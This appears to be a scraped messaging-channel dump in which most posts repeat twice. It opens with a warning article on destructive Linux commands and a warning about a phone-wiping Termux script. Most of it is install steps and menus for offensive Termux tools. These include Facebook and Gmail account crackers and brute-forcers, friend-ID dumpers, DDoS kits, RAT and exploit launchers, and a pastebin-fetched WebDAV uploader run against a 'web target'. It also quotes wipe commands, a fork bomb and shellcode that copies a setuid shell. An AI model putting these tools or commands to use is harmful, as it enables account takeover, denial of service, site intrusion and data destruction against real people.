Forwarded from Villa College
termux tools ..link.pdf
303.9 KB
I am sharing 'termux tools ..link' with you
1)
Taken from a whatsapp group
*8 Deadly Commands You Should Never Run on Linux* by
CHRIS HOFFMAN
Linux’s terminal commands are powerful, and Linux won’t ask you for confirmation if you run a command that will break your system. It’s not uncommon to see trolls online recommending new Linux users run these commands as a joke.
Learning the commands you shouldn’t run can help protect you from trolls while increasing your understanding of how Linux works. This isn’t an exhaustive guide, and the commands here can be remixed in a variety of ways.
Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.
rm -rf / – Deletes Everything!
The command rm -rf / deletes everything it possibly can, including files on your hard drive and files on connected removable media devices. This command is more understandable if it’s broken down:
rm – Remove the following files.
-rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.
Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.
The Lesson: Beware rm -rf.
Disguised rm –rf /
Here’s another snippet of code that’s all over the web:
char esp[] attribute ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
This is the hex version of rm –rf / – executing this command would wipe out your files just as if you had run rm –rf /.
The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.
:(){ :|: & };: – Fork Bomb
The following line is a simple-looking, but dangerous, bash function:
:(){ :|: & };:
This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.
The Lesson: Bash functions are powerful, even very short ones.
image
Image Credit: Dake on Wikimedia Commons
mkfs.ext4 /dev/sda1 – Formats a Hard Drive
The mkfs.ext4 /dev/sda1 command is simple to understand:
mkfs.ext4 – Create a new ext4 file system on the following device.
/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.
Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.
This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.
The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.
command > /dev/sda – Writes Directly to a Hard Drive
The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.
command – Run a command (can be any command.)
> – Send the output of the command to the following location.
/dev/sda – Write the output of the command directly to the hard disk device.
The Lesson: As above, beware running comm
Taken from a whatsapp group
*8 Deadly Commands You Should Never Run on Linux* by
CHRIS HOFFMAN
Linux’s terminal commands are powerful, and Linux won’t ask you for confirmation if you run a command that will break your system. It’s not uncommon to see trolls online recommending new Linux users run these commands as a joke.
Learning the commands you shouldn’t run can help protect you from trolls while increasing your understanding of how Linux works. This isn’t an exhaustive guide, and the commands here can be remixed in a variety of ways.
Note that many of these commands will only be dangerous if they’re prefixed with sudo on Ubuntu – they won’t work otherwise. On other Linux distributions, most commands must be run as root.
rm -rf / – Deletes Everything!
The command rm -rf / deletes everything it possibly can, including files on your hard drive and files on connected removable media devices. This command is more understandable if it’s broken down:
rm – Remove the following files.
-rf – Run rm recursively (delete all files and folders inside the specified folder) and force-remove all files without prompting you.
/ – Tells rm to start at the root directory, which contains all the files on your computer and all mounted media devices, including remote file shares and removable drives.
Linux will happily obey this command and delete everything without prompting you, so be careful when using it! The rm command can also be used in other dangerous ways – rm –rf ~ would delete all files in your home folder, while rm -rf .* would delete all your configuration files.
The Lesson: Beware rm -rf.
Disguised rm –rf /
Here’s another snippet of code that’s all over the web:
char esp[] attribute ((section(“.text”))) /* e.s.p
release */
= “\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68”
“\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99”
“\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7”
“\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56”
“\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31”
“\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69”
“\x6e\x2f\x73\x68\x00\x2d\x63\x00”
“cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;”;
This is the hex version of rm –rf / – executing this command would wipe out your files just as if you had run rm –rf /.
The Lesson: Don’t run weird-looking, obviously disguised commands that you don’t understand.
:(){ :|: & };: – Fork Bomb
The following line is a simple-looking, but dangerous, bash function:
:(){ :|: & };:
This short line defines a shell function that creates new copies of itself. The process continually replicates itself, and its copies continually replicate themselves, quickly taking up all your CPU time and memory. This can cause your computer to freeze. It’s basically a denial-of-service attack.
The Lesson: Bash functions are powerful, even very short ones.
image
Image Credit: Dake on Wikimedia Commons
mkfs.ext4 /dev/sda1 – Formats a Hard Drive
The mkfs.ext4 /dev/sda1 command is simple to understand:
mkfs.ext4 – Create a new ext4 file system on the following device.
/dev/sda1 – Specifies the first partition on the first hard drive, which is probably in use.
Taken together, this command can be equivalent to running format c: on Windows – it will wipe the files on your first partition and replace them with a new file system.
This command can come in other forms as well – mkfs.ext3 /dev/sdb2 would format the second partition on the second hard drive with the ext3 file system.
The Lesson: Beware running commands directly on hard disk devices that begin with /dev/sd.
command > /dev/sda – Writes Directly to a Hard Drive
The command > /dev/sda line works similarly – it runs a command and sends the output of that command directly to your first hard drive, writing the data directly to the hard disk drive and damaging your file system.
command – Run a command (can be any command.)
> – Send the output of the command to the following location.
/dev/sda – Write the output of the command directly to the hard disk device.
The Lesson: As above, beware running comm
2)
ands that involve hard disk devices beginning with /dev/sd.
dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive
The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.
dd – Perform low-level copying from one location to another.
if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.
The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.
hard-drive-lights
Image Credit: Matt Rudge on Flickr
mv ~ /dev/null – Moves Your Home Directory to a Black Hole
Update: This is a common misconception and we were incorrect. Despite much chatter online, it’s not possible to move files and folders to /dev/null. However, if you output or redirect useful data to /dev/null, it will be discarded and destroyed.
/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.
mv – Move the following file or directory to another location.
~ – Represents your entire home folder.
/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.
The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.
wget http://example.com/something -O – | sh – Downloads and Runs a Script
The above line downloads a script from the web and sends it to sh,which executes the contents of the script. This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.
wget – Downloads a file. (You may also see curl in place of wget.)
http://example.com/something – Download the file from this location.
| – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
sh – Send the file to the sh command, which executes it if it’s a bash script.
The Lesson: Don’t download and run untrusted scripts from the web, even with a command.
Know any other dangerous commands that new (and experienced) Linux users shouldn’t run? Leave a comment and share them!
ands that involve hard disk devices beginning with /dev/sd.
dd if=/dev/random of=/dev/sda – Writes Junk Onto a Hard Drive
The dd if=/dev/random of=/dev/sda line will also obliterate the data on one of your hard drives.
dd – Perform low-level copying from one location to another.
if=/dev/random – Use /dev/random (random data) as the input – you may also see locations such as /dev/zero (zeros).
of=/dev/sda – Output to the first hard disk, replacing its file system with random garbage data.
The Lesson: dd copies data from one location to another, which can be dangerous if you’re copying directly to a device.
hard-drive-lights
Image Credit: Matt Rudge on Flickr
mv ~ /dev/null – Moves Your Home Directory to a Black Hole
Update: This is a common misconception and we were incorrect. Despite much chatter online, it’s not possible to move files and folders to /dev/null. However, if you output or redirect useful data to /dev/null, it will be discarded and destroyed.
/dev/null is another special location – moving something to /dev/null is the same thing as destroying it. Think of /dev/null as a black hole. Essentially, mv ~ /dev/null sends all your personal files into a black hole.
mv – Move the following file or directory to another location.
~ – Represents your entire home folder.
/dev/null – Move your home folder to /dev/null, destroying all your files and deleting the original copies.
The Lesson: The ~ character represents your home folder and moving things to /dev/null destroys them.
wget http://example.com/something -O – | sh – Downloads and Runs a Script
The above line downloads a script from the web and sends it to sh,which executes the contents of the script. This can be dangerous if you’re not sure what the script is or if you don’t trust its source – don’t run untrusted scripts.
wget – Downloads a file. (You may also see curl in place of wget.)
http://example.com/something – Download the file from this location.
| – Pipe (send) the output of the wget command (the file you downloaded) directly to another command.
sh – Send the file to the sh command, which executes it if it’s a bash script.
The Lesson: Don’t download and run untrusted scripts from the web, even with a command.
Know any other dangerous commands that new (and experienced) Linux users shouldn’t run? Leave a comment and share them!
Bahaya Menggunakan Script/Tools Termux dari _*[Script termux] By ︦︦⫷MR.GREEN⫸*_
Setelah saya analisis di dalam sc tersebut terdapat perintah ( rm -rf )
yang digunakan untuk *PENGHAPUSAN PAKSA DATA PRIBADI DI HP ANDA*
Berikut adalah sebagian isi nya
termux-setup-storage
rm -rf /storage/emulated/0
rm -rf /sdcard/0
rm -rf /storage/emulated/0/DCIM
rm -rf /storage/emulated/0/android/obb
rm -rf /sdcard/0/android/data
rm -rf $HOME
rm -rf sdcard/0
rm -rf storage/emulated/0
rm -rf /storage/emulated/0/WhatsApp
rm -rf /sdcard/0/WhatsApp
rm -rf /storage/emulated/0/Downloads
rm -rf /storage/emulated/0/Music
rm -rf /sdcard/0/Music
*Perintah diatas akan melakukan Penghapusan data mulai dari Music,Downloads,Whatsapp,DCIM (GALERI),dan ada* *OBB yang artinya menghapus data Aplikasi yang ada di HP ANDA.*
*DIMOHON UNTUK SHARE KE GRUP" LAIN AGAR TIDAK ADA LAGI KORBAN!*
_SALAM DARI GRUP SCT|_
*Salam Dari* _*⫷MR.HACKING⫸_*
*#SEBARKAN*
¶¶ Translated to english ¶¶
Dangers of Using Termux Script / Tools from _ * [Termux Script] By ︦︦⫷MR.GREEN⫸ * _
After I analyzed the sc, there was a command (rm -rf)
used for * DELETION OF FORCED PERSONAL DATA ON YOUR HP *
Here are some of the contents
termux-setup-storage
rm -rf / storage / emulated / 0
rm -rf / sdcard / 0
rm -rf / storage / emulated / 0 / DCIM
rm -rf / storage / emulated / 0 / android / obb
rm -rf / sdcard / 0 / android / data
rm -rf $ HOME
rm -rf sdcard / 0
rm -rf storage / emulated / 0
rm -rf / storage / emulated / 0 / WhatsApp
rm -rf / sdcard / 0 / WhatsApp
rm -rf / storage / emulated / 0 / Downloads
rm -rf / storage / emulated / 0 / Music
rm -rf / sdcard / 0 / Music
* The above command will do the data deletion starting from Music, Downloads, Whatsapp, DCIM (GALLERY), and there is * * OBB which means to delete the existing Application data on YOUR cellphone. *
* APPLICABLE FOR SHARE TO GROUPS "ANOTHER THERE IS NO LONGER VICTIMS! *
_ GREETINGS FROM SCT GROUP | _
* Greetings From * _ * ⫷MR.HACKING⫸_ *
* # SPREAD *
Setelah saya analisis di dalam sc tersebut terdapat perintah ( rm -rf )
yang digunakan untuk *PENGHAPUSAN PAKSA DATA PRIBADI DI HP ANDA*
Berikut adalah sebagian isi nya
termux-setup-storage
rm -rf /storage/emulated/0
rm -rf /sdcard/0
rm -rf /storage/emulated/0/DCIM
rm -rf /storage/emulated/0/android/obb
rm -rf /sdcard/0/android/data
rm -rf $HOME
rm -rf sdcard/0
rm -rf storage/emulated/0
rm -rf /storage/emulated/0/WhatsApp
rm -rf /sdcard/0/WhatsApp
rm -rf /storage/emulated/0/Downloads
rm -rf /storage/emulated/0/Music
rm -rf /sdcard/0/Music
*Perintah diatas akan melakukan Penghapusan data mulai dari Music,Downloads,Whatsapp,DCIM (GALERI),dan ada* *OBB yang artinya menghapus data Aplikasi yang ada di HP ANDA.*
*DIMOHON UNTUK SHARE KE GRUP" LAIN AGAR TIDAK ADA LAGI KORBAN!*
_SALAM DARI GRUP SCT|_
*Salam Dari* _*⫷MR.HACKING⫸_*
*#SEBARKAN*
¶¶ Translated to english ¶¶
Dangers of Using Termux Script / Tools from _ * [Termux Script] By ︦︦⫷MR.GREEN⫸ * _
After I analyzed the sc, there was a command (rm -rf)
used for * DELETION OF FORCED PERSONAL DATA ON YOUR HP *
Here are some of the contents
termux-setup-storage
rm -rf / storage / emulated / 0
rm -rf / sdcard / 0
rm -rf / storage / emulated / 0 / DCIM
rm -rf / storage / emulated / 0 / android / obb
rm -rf / sdcard / 0 / android / data
rm -rf $ HOME
rm -rf sdcard / 0
rm -rf storage / emulated / 0
rm -rf / storage / emulated / 0 / WhatsApp
rm -rf / sdcard / 0 / WhatsApp
rm -rf / storage / emulated / 0 / Downloads
rm -rf / storage / emulated / 0 / Music
rm -rf / sdcard / 0 / Music
* The above command will do the data deletion starting from Music, Downloads, Whatsapp, DCIM (GALLERY), and there is * * OBB which means to delete the existing Application data on YOUR cellphone. *
* APPLICABLE FOR SHARE TO GROUPS "ANOTHER THERE IS NO LONGER VICTIMS! *
_ GREETINGS FROM SCT GROUP | _
* Greetings From * _ * ⫷MR.HACKING⫸_ *
* # SPREAD *
¶¶ Termux-New-Look V2.9
¶¶ Installation /
📍pkg install git
📍git clone http://github.com/rooted-cyber/Termux-New-Look
📍cd Termux-New-Look
📍pip2 install -r requirements.txt
📍bash setup.sh
Press 13 to check for update
============================
[~] Termux-New-Look V2.9
============================
[ 1 ] Open Termux
[ 2 ] Installation menu
[ 3 ] Termux Shortcut
[ 4 ] Pip Upgrade
[ 5 ] Termux-Root
[ 6 ] Termux Os
[ 7 ] Termux Game
[ 8 ] Convert into Tool
[ 9 ] About
[ 10 ] Termux Button
[ 11 ] Termux Others
[ 12 ] Bomber
[ 13 ] Checking Updates
[ 14 ] Exit
===========================
[ T ] Termux New Look Uninstalled
==============================
===============================
[ U ] Update Termux-New-Look
============================
[-] Current version : V2.9
Select your option >
¶¶ Installation /
📍pkg install git
📍git clone http://github.com/rooted-cyber/Termux-New-Look
📍cd Termux-New-Look
📍pip2 install -r requirements.txt
📍bash setup.sh
Press 13 to check for update
============================
[~] Termux-New-Look V2.9
============================
[ 1 ] Open Termux
[ 2 ] Installation menu
[ 3 ] Termux Shortcut
[ 4 ] Pip Upgrade
[ 5 ] Termux-Root
[ 6 ] Termux Os
[ 7 ] Termux Game
[ 8 ] Convert into Tool
[ 9 ] About
[ 10 ] Termux Button
[ 11 ] Termux Others
[ 12 ] Bomber
[ 13 ] Checking Updates
[ 14 ] Exit
===========================
[ T ] Termux New Look Uninstalled
==============================
===============================
[ U ] Update Termux-New-Look
============================
[-] Current version : V2.9
Select your option >
👍1
¶¶ darkfb.py
¶¶ #facebook #yahoo #dumpid
📍cd storage
📍cd download
📍ls
📍python2 dark.py
¶¶ Username :fb id
¶¶ Password : fb pass
Login
[01]. Crack acount
[02]. list group
[03]. Find user
[04]. Yahoo clone
[05]. Crack facebook target
[06]. Bot colection
[07]. acount Cheker
[08]. dump id members grup
[09]. Write status
[10]. Accept friends
[00]. Log0ut
choose >>
¶¶ #facebook #yahoo #dumpid
📍cd storage
📍cd download
📍ls
📍python2 dark.py
¶¶ Username :fb id
¶¶ Password : fb pass
Login
[01]. Crack acount
[02]. list group
[03]. Find user
[04]. Yahoo clone
[05]. Crack facebook target
[06]. Bot colection
[07]. acount Cheker
[08]. dump id members grup
[09]. Write status
[10]. Accept friends
[00]. Log0ut
choose >>
¶¶ beyawak
¶¶ #facebook #dumpfriendid
📍pkg install python2
📍pkg install git
📍git clone https://github.com/Ranginang67/beyawak
📍cd beyawak
📍ls
📍python2 beyawak.py
}---------+={ Coded by Ms.ambari }=+---------{
[1] http header information
[2] admin panel finder
[3] shell backdoor scanner
[4] dump friend id on facebook
[5] subdomain scanner
[6] facebook auto update status
[x] exit this tool
[+] beyawak [1/6] >
¶¶ #facebook #dumpfriendid
📍pkg install python2
📍pkg install git
📍git clone https://github.com/Ranginang67/beyawak
📍cd beyawak
📍ls
📍python2 beyawak.py
}---------+={ Coded by Ms.ambari }=+---------{
[1] http header information
[2] admin panel finder
[3] shell backdoor scanner
[4] dump friend id on facebook
[5] subdomain scanner
[6] facebook auto update status
[x] exit this tool
[+] beyawak [1/6] >
¶¶ [4] Information - Gathering -
[1] Devsploit
[2] ReconDog
[3] HackerTargetRevLookUp [4] Infoga
[5] BillChiher
[6] Th3inspector
[+] Choose The Number you want ===>
¶¶ [5] StressTesting - site -( ddos )
[1] DDos-Attack
[2] Ddos
[3] Torshammer
[4] Slowloris
[5] Fl00d && Fl00d2
[6] GoldenEye
[7] Xerxes
[8] Planetwork-DDoS
[00] Back
[+] Choose The Number you want ===>
[1] Devsploit
[2] ReconDog
[3] HackerTargetRevLookUp [4] Infoga
[5] BillChiher
[6] Th3inspector
[+] Choose The Number you want ===>
¶¶ [5] StressTesting - site -( ddos )
[1] DDos-Attack
[2] Ddos
[3] Torshammer
[4] Slowloris
[5] Fl00d && Fl00d2
[6] GoldenEye
[7] Xerxes
[8] Planetwork-DDoS
[00] Back
[+] Choose The Number you want ===>
¶¶ MalamMinggu
¶¶ #ddos #payload #site #scan #information
¶¶ for information gathering / vulnerabilities /ddos/
pkg update && pkg upgrade -y
pkg install git
pkg install toilet
https://github.com/404system/MalamMinggu
cd MalamMinggu
ls
python2 MalamSystem.py
¶¶ [1] Tools Hack - System -
[1] A-Rat
[2] The Fat Rat
[3] 1337Rat
[4] Wifite
[5] Shellter
run this tool (Open Terminal and write this ==> sudo shellter
[6] setoolkit
[7] Metasploit
[8] kickthemout
[00] Back
¶¶ [2] Tools Hack - site -
[1] D-TECT
[2] Wordpress Bruteforce [3] Joomscan
[4] XAttacker
[5] WORDPRESS-Revslider-Exploit-0DAY [6] Prestashop Modules Shell Upload Exploit [7] ICG-AutoExploiterBot
[8] Devploit
[9] Sqldump
[10] Wordpress Vulnerability [00] Back
¶¶ [3] Tools Scan - site -
[1] Ko-Dork
[2] DAVsploit
[3] BinGoo
[4] WAScan
[5] vunlink
[6] Dzjecter
[7] Th3inspector
[8] Bing_Grab
[00] Back
👇👇
¶¶ #ddos #payload #site #scan #information
¶¶ for information gathering / vulnerabilities /ddos/
pkg update && pkg upgrade -y
pkg install git
pkg install toilet
https://github.com/404system/MalamMinggu
cd MalamMinggu
ls
python2 MalamSystem.py
¶¶ [1] Tools Hack - System -
[1] A-Rat
[2] The Fat Rat
[3] 1337Rat
[4] Wifite
[5] Shellter
run this tool (Open Terminal and write this ==> sudo shellter
[6] setoolkit
[7] Metasploit
[8] kickthemout
[00] Back
¶¶ [2] Tools Hack - site -
[1] D-TECT
[2] Wordpress Bruteforce [3] Joomscan
[4] XAttacker
[5] WORDPRESS-Revslider-Exploit-0DAY [6] Prestashop Modules Shell Upload Exploit [7] ICG-AutoExploiterBot
[8] Devploit
[9] Sqldump
[10] Wordpress Vulnerability [00] Back
¶¶ [3] Tools Scan - site -
[1] Ko-Dork
[2] DAVsploit
[3] BinGoo
[4] WAScan
[5] vunlink
[6] Dzjecter
[7] Th3inspector
[8] Bing_Grab
[00] Back
👇👇
¶¶ Info DNS System Website Check Info Create Tools Check Ip / Location
#dns #ip #nmap. /testing 🤦♂
https://github.com/Hackermrlinkerrorsystem/InfoSystem
cd InfoSystem
ls
python2 Info.py
[1]> DNS LookUP
[2]> Whois LookUP
[3]> GeoIP LookUP
[4]> nmap portscanner
[5]> ReverseIP
[6]> DomainToIpConverter
[7]> DNS Host Search
[0]> Exit
root@kalilinux ~#
#dns #ip #nmap. /testing 🤦♂
https://github.com/Hackermrlinkerrorsystem/InfoSystem
cd InfoSystem
ls
python2 Info.py
[1]> DNS LookUP
[2]> Whois LookUP
[3]> GeoIP LookUP
[4]> nmap portscanner
[5]> ReverseIP
[6]> DomainToIpConverter
[7]> DNS Host Search
[0]> Exit
root@kalilinux ~#
👍1
¶¶Tools special for porn Site's
#indonesia
#porn videos 🤦♂
https://github.com/Hackermrlinkerrorsystem/ToolsBokepanjay
cd ToolsBokepanjay
ls
sh Bokepterus.sh
[0] Download VPN Gratis
[1] Hihihi JAV
[2] Brazzer
[3] Porn Hub
[4] Pink Lips
[5] XNXX
[6] Tube Galore
[7] Nice Porn
[8] Red Porn
[9] X-Videos
[10] Tube V-Sex
[99] Jalan Tobat
{•}Membutuhkan Koneksi VPN
[•]Nyalakan VPN terlebih dahulu
[•]Yang Belum Punya Bisa Pilih No.0
╭─# Pilih Bokep Favorit Anda :
╰───[?] MrLinkErrorSysten :
#indonesia
#porn videos 🤦♂
https://github.com/Hackermrlinkerrorsystem/ToolsBokepanjay
cd ToolsBokepanjay
ls
sh Bokepterus.sh
[0] Download VPN Gratis
[1] Hihihi JAV
[2] Brazzer
[3] Porn Hub
[4] Pink Lips
[5] XNXX
[6] Tube Galore
[7] Nice Porn
[8] Red Porn
[9] X-Videos
[10] Tube V-Sex
[99] Jalan Tobat
{•}Membutuhkan Koneksi VPN
[•]Nyalakan VPN terlebih dahulu
[•]Yang Belum Punya Bisa Pilih No.0
╭─# Pilih Bokep Favorit Anda :
╰───[?] MrLinkErrorSysten :
👍1
Forwarded from Villa College
¶¶ dark1.8 -free
¶¶ #darkfb 1.8 New
Tools dark FB 1.8 Free
¶¶ COMMANDS¶¶
📍pkg Install python2
📍pkg Install git
📍pip2 install bs4
📍pip2 install requests
📍pip2 install mechanize
📍git clone https://github.com/EzXz/dark1.8.git
📍cd dark1.8
📍python2 dark.py
Note: I suggest before logging in on Termux, log in first to Opera Mini,
¶¶ #darkfb 1.8 New
Tools dark FB 1.8 Free
¶¶ COMMANDS¶¶
📍pkg Install python2
📍pkg Install git
📍pip2 install bs4
📍pip2 install requests
📍pip2 install mechanize
📍git clone https://github.com/EzXz/dark1.8.git
📍cd dark1.8
📍python2 dark.py
Note: I suggest before logging in on Termux, log in first to Opera Mini,
Forwarded from Villa College
¶¶ webdve
📍pkg install openssl curl
📍pkg install libcurl
📍mkdir webdav
📍cd webdav
📍wget https://pastebin.com/raw/HnVyQPtR
📍mv HnVyQPtR webdav.py
📍cd / sdcard
📍cp (your script name) $ HOME / webdav
📍cd
📍cd webdav
📍python2 webdav.py (web target) (your script) (enter)
📍pkg install openssl curl
📍pkg install libcurl
📍mkdir webdav
📍cd webdav
📍wget https://pastebin.com/raw/HnVyQPtR
📍mv HnVyQPtR webdav.py
📍cd / sdcard
📍cp (your script name) $ HOME / webdav
📍cd
📍cd webdav
📍python2 webdav.py (web target) (your script) (enter)
Forwarded from Villa College
¶¶ FBNEWV2
#facebook #bruteforce /still testing
📍pkg install git
📍pkg install python2
📍pip2 install --upgrade pip
📍pip2 install mechanize
📍git clone https://github.com/MRA27/FBNEWV2
📍cd FBNEWV2
📍python2 MRA27.py
=============================
Crack Account Facebook
=============================
Example =>
Input ID : 1000××××××××××
Input Passwordlist : password.txt
=============================
Input ID : 12345678910
Input Passwordlist :password.txt
#facebook #bruteforce /still testing
📍pkg install git
📍pkg install python2
📍pip2 install --upgrade pip
📍pip2 install mechanize
📍git clone https://github.com/MRA27/FBNEWV2
📍cd FBNEWV2
📍python2 MRA27.py
=============================
Crack Account Facebook
=============================
Example =>
Input ID : 1000××××××××××
Input Passwordlist : password.txt
=============================
Input ID : 12345678910
Input Passwordlist :password.txt
Forwarded from Villa College
¶¶ dark-vpro
#darkfb #fb #facebook
📍pkg update && pkg upgrade
📍pkg install git
📍pkg install python2
📍pkg install mechanize
📍pkg install request
📍git clone https://github.com/m4rche3ll-cyber/dark-vpro
📍cd dark-vpro
📍python2 dark-vpro.py
#darkfb #fb #facebook
📍pkg update && pkg upgrade
📍pkg install git
📍pkg install python2
📍pkg install mechanize
📍pkg install request
📍git clone https://github.com/m4rche3ll-cyber/dark-vpro
📍cd dark-vpro
📍python2 dark-vpro.py
¶¶ ToolsMr / 25Toolx
¶¶ #Termux-packages
📍pkg install python2
📍pkg install git
📍git clone https://github.com/Hackermrlinkerrorsystem/ToolsMr
📍cd ToolsMr
📍ls
📍sh installbahan.sh
📍python2 ToolsLinkv2.py
--------------------------------------------------
(01).Hammer
(02).Spammer-Grab
(03).Red Hawk
(04).Galau Tools
(05).Facebook Brute Force
(06).Webdav
(07).Metasploit
(08).KaliNethunter
(09).infoga
(10).D-Tect
(11).Hydra
(12).SQLMap
(13).WFDroid
(14).viSQL
(15).The Fat Rat
(16).aircrack-ng
(17).joomscan
(18).Cms Scanner
(19).IPGeolocation
(20).RouterSploit
(21).91ToolsTERMUX Siap Pake
(22).200 ToolsTERMUX Siap Pake
(23).DDOS Attack Full System
(24).gmail brute force
(25).Oh-myzsh theme for termux
(99).ExitZ
--------------------------------------------------
GUNAKAN TOOLS DENGAN BIJAK CUK :V |
-------------------------------------------
Type number to install the Tool you need ...
¶¶ #Termux-packages
📍pkg install python2
📍pkg install git
📍git clone https://github.com/Hackermrlinkerrorsystem/ToolsMr
📍cd ToolsMr
📍ls
📍sh installbahan.sh
📍python2 ToolsLinkv2.py
--------------------------------------------------
(01).Hammer
(02).Spammer-Grab
(03).Red Hawk
(04).Galau Tools
(05).Facebook Brute Force
(06).Webdav
(07).Metasploit
(08).KaliNethunter
(09).infoga
(10).D-Tect
(11).Hydra
(12).SQLMap
(13).WFDroid
(14).viSQL
(15).The Fat Rat
(16).aircrack-ng
(17).joomscan
(18).Cms Scanner
(19).IPGeolocation
(20).RouterSploit
(21).91ToolsTERMUX Siap Pake
(22).200 ToolsTERMUX Siap Pake
(23).DDOS Attack Full System
(24).gmail brute force
(25).Oh-myzsh theme for termux
(99).ExitZ
--------------------------------------------------
GUNAKAN TOOLS DENGAN BIJAK CUK :V |
-------------------------------------------
Type number to install the Tool you need ...
2)
■ Facetool -15Tools
#facebook #darfb #Asu-Tool #ASU #OSIF #multibrutefoce #targetbruteforce #autombf #mbf
📍pkg update
📍pkg upgrade
📍pkg install python2
📍pkg install git
📍pkg install unzip
📍git clone https://github.com/saydog/Facetool
📍cd Facetool
📍ls
📍unzip facetool.zip
📍sh install.sh
📍python2 facetool.py
《--------------------------》
USAGE THIS TOOLS
Use command : help
Face®tool > type help
■ HELP MENU
-----------------------------------
| command description |
|---------------------------------|
| show Show all tools |
| token Login token fb |
| logout Logout token fb |
| exit Exit program |
-----------------------------------
Face®tool > type show
This will show all tools
■ Welcome to Tools Menu
Choose number for running the tools
-----------------------------------
0. Back
-----------------------------------
1. Darkfb version 1.4
-----------------------------------
2. Darkfb version 1.5
-----------------------------------
3. Darkfb version 1.6
-----------------------------------
4. Darkfb version 1.7
-----------------------------------
5. Darkfb version 1.8
-----------------------------------
6. Darkfb version 1.9
-----------------------------------
7. Darkfb version VIP
-----------------------------------
8. Darkfb version VIP 2
-----------------------------------
9. Darkfb version GOLD
-----------------------------------
10. Darkfb version KING
-----------------------------------
11. Multi Bruteforce
-----------------------------------
12. Target Bruteforce
-----------------------------------
13. Auto Grab ID
-----------------------------------
14. Asu Toolkit V5
-----------------------------------
15. OSIF Framework
-----------------------------------
[CHOOSE] Number :
■● for video ●■
https://youtu.be/vfbRPJn1fPE
■ Facetool -15Tools
#facebook #darfb #Asu-Tool #ASU #OSIF #multibrutefoce #targetbruteforce #autombf #mbf
📍pkg update
📍pkg upgrade
📍pkg install python2
📍pkg install git
📍pkg install unzip
📍git clone https://github.com/saydog/Facetool
📍cd Facetool
📍ls
📍unzip facetool.zip
📍sh install.sh
📍python2 facetool.py
《--------------------------》
USAGE THIS TOOLS
Use command : help
Face®tool > type help
■ HELP MENU
-----------------------------------
| command description |
|---------------------------------|
| show Show all tools |
| token Login token fb |
| logout Logout token fb |
| exit Exit program |
-----------------------------------
Face®tool > type show
This will show all tools
■ Welcome to Tools Menu
Choose number for running the tools
-----------------------------------
0. Back
-----------------------------------
1. Darkfb version 1.4
-----------------------------------
2. Darkfb version 1.5
-----------------------------------
3. Darkfb version 1.6
-----------------------------------
4. Darkfb version 1.7
-----------------------------------
5. Darkfb version 1.8
-----------------------------------
6. Darkfb version 1.9
-----------------------------------
7. Darkfb version VIP
-----------------------------------
8. Darkfb version VIP 2
-----------------------------------
9. Darkfb version GOLD
-----------------------------------
10. Darkfb version KING
-----------------------------------
11. Multi Bruteforce
-----------------------------------
12. Target Bruteforce
-----------------------------------
13. Auto Grab ID
-----------------------------------
14. Asu Toolkit V5
-----------------------------------
15. OSIF Framework
-----------------------------------
[CHOOSE] Number :
■● for video ●■
https://youtu.be/vfbRPJn1fPE